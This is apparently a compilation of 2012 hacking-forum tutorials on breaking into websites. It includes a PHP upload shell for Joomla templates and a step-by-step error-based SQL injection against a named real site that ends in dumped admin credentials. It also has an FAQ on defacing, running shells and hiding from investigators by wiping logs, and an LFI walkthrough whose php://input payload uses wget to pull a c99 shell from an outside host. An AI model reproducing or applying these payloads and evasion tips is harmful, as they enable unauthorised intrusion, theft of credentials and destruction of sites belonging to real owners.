April 2012

For this week's tutorial, we're gonna use two method of shelling Joomla sites in case one method doesn't work.
So let's get started.

First Method: Shelling Joomla sites using Templates.

Step1: Login into the Joomla administrator's admin panel.

Alright, once we're logged in, navigate to "Extensions" and click "Template manager"

Once you're there, you'll see a bunch of themes you can choose.
Choose any theme you would like to edit. I suggest you leave the default theme untouched.
Once you've chosen a theme, select it, and Click on Edit

Once you have clicked Edit, Click on "Edit HTML"

You'll see the source code and the path of the Template once you've clicked "Edit HTML".
Make sure to copy the "Path".

Now Erase the source code and replace it with:

Code:

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Twitter: @zerofreakz</b><br><br>'; } else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

This is how it would look like:

Once you've done that, you shall navigate to your shell by using the path information they have given you.
So it'll be like:

Code:

http://site.com/templates/beez/index.php

It will look like this:

So that's how you're gonna upload a shell on a Joomla site using the "Templates" Method.

Hey guys,
It's Zer0 and I'll be explaining another type of Error Based SQL injection.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.

So let's get started

In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):

Code:

http://www.seenpm.org/

The vulnerable link would be:

Code:

http://www.seenpm.org/new/index.php?id=151'

Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully

Code:

count(*) = Returns the total number of records in the table/view

group by = Groups the result of the query set by one or more columns

concat = shows the results in one column

information_schema = The default database

table_schema = Specified database

table_name = The current table name

limit = Limits the amount of content to be displayed

mid() = Used to extract characters from a text field

See more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp

NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between
Getting the version of their database (2 main ways to do it):
First way:
Query:

Code:

+AND(SELECT COUNT(*) FROM 
(SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT 
version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+AND(SELECT
 COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by 
CONCAT((SELECT version() FROM information_schema.tables LIMIT 
0,1),FLOOR(RAND(0)*2)))

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Second way:
Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
​
3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_
​schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f
​rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

Now that we've got the version, let's extract the database:

Query used:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
​
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f
​rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)--
 x

URL will look like this:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche
​ma_name),0x7e)+from+information_schema.schemata 
limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'

Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step

Screenshot:

Spoiler (Click to Hide)

We have the database and version so far

Now for the tables in their current database

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
​
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr
​om+information_schema.tables where table_schema=database() 
limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
​e_name),0x7e)+from+information_schema.tables where 
table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

'links,members,menu,menu_s1' for key 'group_key'

Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.

Leave the limit 0,1 function and don't touch it

What you need to alter now is the integers of the mid() function
i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ma.tables where table_schema=database() limit+0,1),1,25)

Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables

I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25

So the query with the URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
​e_name),0x7e)+from+information_schema.tables where 
table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

Now for the columns in the specified table i.e users

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
​
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f
​rom+information_schema.columns where table_name=0xHex_Table 
limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Notice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu
​mn_name),0x7e)+from+information_schema.columns where 
table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Now notice the mid() function
I've incremented from 1,25 to 4,25

Result:

Code:

'username,password,email,n1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

Now to extract the data from the desired columns
Columns we have so far: "username", "password"

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
​
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo
​rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
​
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user
​name,0x3a,password),0x7e)+from+users 
limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'

Notice how I didn't increment the mid() function
This because the content is completely shown
Note: You can know that the data is completely shown when there is a ~ sign or signs

Screenshot:

Video Demonstration Below:

Introductions
-Hello guys, I'm ZeroFreak and today I'll be posting a couple of questions related to web hacking.
-In the past few days, I've seen a lot of people having troubles and get stuck at a certain point while they hack.
-Well, most of these "questions" will be answered and hopefully you'll find this thread useful

I'll be grouping the types of questions to make it easier for you guys to understand what you'll be reading
Part 1: General Web Hacking FAQ

Question: What is a shell when it comes to web hacking?
Answer: Well, basically a shell is a type of .php file needed to be uploaded on a hacked website or a host in order to make it work.
The way is works is not that complex if you wonder. With a shell uploaded to your hacked website or host, you can alter almost anything using it.
While you're using a shell, you will be able to:

Delete Website Directories and upload your deface page
Can be used to DDoS another website (depends on what type of shell you're using
Having a shell with many functions, you can also crack MD5 Hash, modify another php file, mass mail someone, email bomb an email!

An example of a shell I use is: http://sourceforge.net/projects/ani-shell/

Question: What does defacing mean and what's a deface page
Answer:Defacing, in most certain cases, means that you wanna upload a specific file of yours,mostly a message to prove the administrator that you hacked the website.
If you think about it, it's relatively similar to a deface page.
A deface page, while hacking a website, is simply a message to convey to the owner of the website that you've owned their security.
Most people do this for fun, fame, or other stuff that can satisfy your hacking skills.
If you're a beginner in web hacking, defacing a site will be considered as a big success for you just like me :)

Question:A common difference between a shelled website and a defaced website?
Answer:Simply answering, a shelled website can be used as hosting for illegal operations, can be used for DDoSing and other functions a shell can perform
while a defaced website is simply a type of message, mostly threatening and fun which conveys the owner of the website that their security is low and that you owned them

Question:My IP was logged while I was hacking, what should I do now?!
Answer:Well, first of all, don't ever freak the hell out or piss on your pants! Calm down a bit and get your head straight.
Now to the point, if your IP has ever been logged, their is a huge chance that you won't get caught. However don't be too happy about it.
Try WHOISing the website and see if this website is an important source to the owner. If it is, you might wanna leave the website forever. What I mean is that, you can just leave the site alone so that the owner won't get too suspicious of what's happening.
Now for the most important part, next time use as VPN that never saves logs of your activity on the internet.
Examples of VPN:
1. nVPN (paid)
2. ProXPN (free)
You can also use proxy to keep yourself anonymous.
An advice from me and all other web hackers out there, no matter what you hack whether it's a bullshit website or a strict government website, always stay behind a VPN or Proxy and stay anonymous!

Question:What is a hash and what can I do with it?
Answer:To get to the point, a hash is basically an encryption. To be specific, a special encryption which requires hash cracking knowledge in order to reveal the plain text
Unlike other encryption, a hash can't be decrypted. In other words, to successfully crack a hash, you either might need to use a hash cracking website or an external hash cracking program with an enormous word list.
An example of a website for cracking hashes:
http://www.md5decrypter.co.uk/

Program for cracking:
HashCat

Now there are different types of hashes out there and you can determine what kind of hash it is by studying the number of characters and the types of characters in the code.
To know most of the types of hashes, visit this thread (Credits to Haxor!:) )
http://www.hackforums.net/showthread.php?tid=1393830

Other types of encryption can be decrypted using "http://www.crypo.com"

Question:What is rooting a.k.a rooting rooting a server?
Answer:Rooting a server in simple words means that you're having a complete remote access to a server (computer).
Rooting works on the basis of exploits. Most websites are running through Linux servers. Now what will you gain when you root a server?
Easier said than done, you will gain remote control of the websites associated and run by that server.
It's like hacking more than 1 website at a time.
Rooting can be done with Linux and Windows and is really a hard method of web hacking when you're a newb to it.
You can search millions of tutorials out there about rooting, but you might wanna start from the basics first

Question: Is there any tool that can help me ease my web hacking activity while I hack websites?
Answer:First of all, never use tools that will do the job for you i.e hack everything for you! You don't wanna get your ass stuck while you watch a program hack websites for you and you don't learn anything Now, there are many useful tools out there that can help you speed up your activity when you start hacking websites. These tools are mostly add-on installed in a browser called Firefox (which is really a good famous browser for hacking)
You can use some of the following:
1. HackBar add-on for Firefox:

Has a built in automatic column-number posting when you use UNION SELECT in SQL injection
Tools you need when you XSS
Built-in Text to Hex and Hext to Text
A big space for customizing your queries

2. Cookies Manager:

A very efficient tool for adding/deleting/modifying cookies
Organized layout and a friendly GUI

3. Live HTTP Headers:

Manage all the activities your browser performs i.e record the activities your browser is performing live
A very useful tool for uploading Shells on a hacked site (Used for renaming your shell.php.jpg to shell.php
Replay the activity on your browser while you alter your cookies to make changes

4. Tamper Data:

Mostly used in LFI (Local File Inclusion)
Instantly records the connections being made in your browser from the websites opened

Question: I'm very new to Web Hacking, I'm confused, where can I start?
Answer: You can start from the very basics to the advanced, but never be in a hurry when you're just starting.
Here's what you can study first:
1. HTML coding
2. PHP
3. Javascript
4. Cookies
Don't work hard on mastering all of them though, just learn the basics and try to get the hang of it.
Once you've got an idea about those four, methods of web hacking are what you're searching for now.
Many methods can be learned and used and some of them are listed below from the easiest to an intermediate level.
1. SQL injection
2. XSS
3. LFI/RFI

I recommend you to start from the basics of SQL injection. Then you can progress to further advanced methods of web hacking (More about those methods below)

Question: What are the types of web hacking methods?
Answer: Some of the types are explained below

1. SQL injection: Queries entered in order to extract information from the database of the website

Error Based SQL injection
Union Based SQL injection
Time Based SQL injection
Blind SQL injection
String Based SQL injection

There's also something called WAF Bypassing where you bypass the firewalls installed on the website. This can lead to combinations of SQL injection if you think about it. Examples are like

String Based WAF bypassing SQL injection
String-Error Based WAF Bypassing SQL injection
WAF Bypassing Double Query SQL injection

2. XSS (Cross Site Scripting): Execute scripts to perform functions required to hack a website

Persistent - Can be used for cookie stealing
Non-Persistent- Can be used as an HTML injection, commonly used for website vulnerabity proofs

3. LFI (Local File Inclusion): Directory exploits used to upload files into the website(example: shells)

/proc/self
Log Poisoning
Malicious Image Upload

This is all what I can cover for now. But I'll be making tutorials on web hacking soon

Question: What should we do before we start to attempt web hacking?
Answer: You might need to do the following when you start hacking websites.

1. Proxy/ VPN (Virtual Private Network)
Always stay behind a proxy or a VPN no matter how useless or precious the site you're attempting to hacking could be.
Proxies can be obtained from here

And a VPN you can use is:
ProXPN: http://www.proxpn.com

Note: When using a VPN, always use one that doesn't store logs and it's really a serious matter.
Hack from another Wireless network if possible

2. Expose prevention
Never attempt to share your web hacking activity anywhere or anyone unless you trust that person so that you both can discuss and learn together.
Some stranger might report you or blackmail you and that would really suck

Question: What should I do after I'm done with hacking the website?
Answer: You don't wanna get caught or reported or trace. Here are some tips.

1. Logs in the admin panel's website
After you're done with everything i.e defacing/shelling, make sure to erase the logs created in the panel. Their is a possibility your IP could be stored in one of their directories

2. Erase your tracks
Make sure to delete everything done on your browser i.e cookies, logs, logins etc
You can do this using CCleaner

3. Pride of success
Don't be too proud sharing what you have just done, some people are really not trust-worthy and could open up a report anytime.
Be happy of what you've done and share to ones you have trust on.

Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:

Click this bar to view the original image of 667x422px.

Now lets try reading:
Code:
/proc/self/environ
/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

Click this bar to view the original image of 651x389px.

Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"

I'll show you how to exploit via php://input using the "Hackbar"

So lets check what we're supposed to use in the Hackbar

Click this bar to view the original image of 686x190px.

Now let's try putting this method in action.
Look at the picture carefully.

Click this bar to view the original image of 800x325px.

URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
 <? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's gonna look like.

Click this bar to view the original image of 680x173px.

Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
You can watch a video tutorial below so that it'll be easier to understand.
Have fun.

Team Intra

If you need any help, feel free to ask me.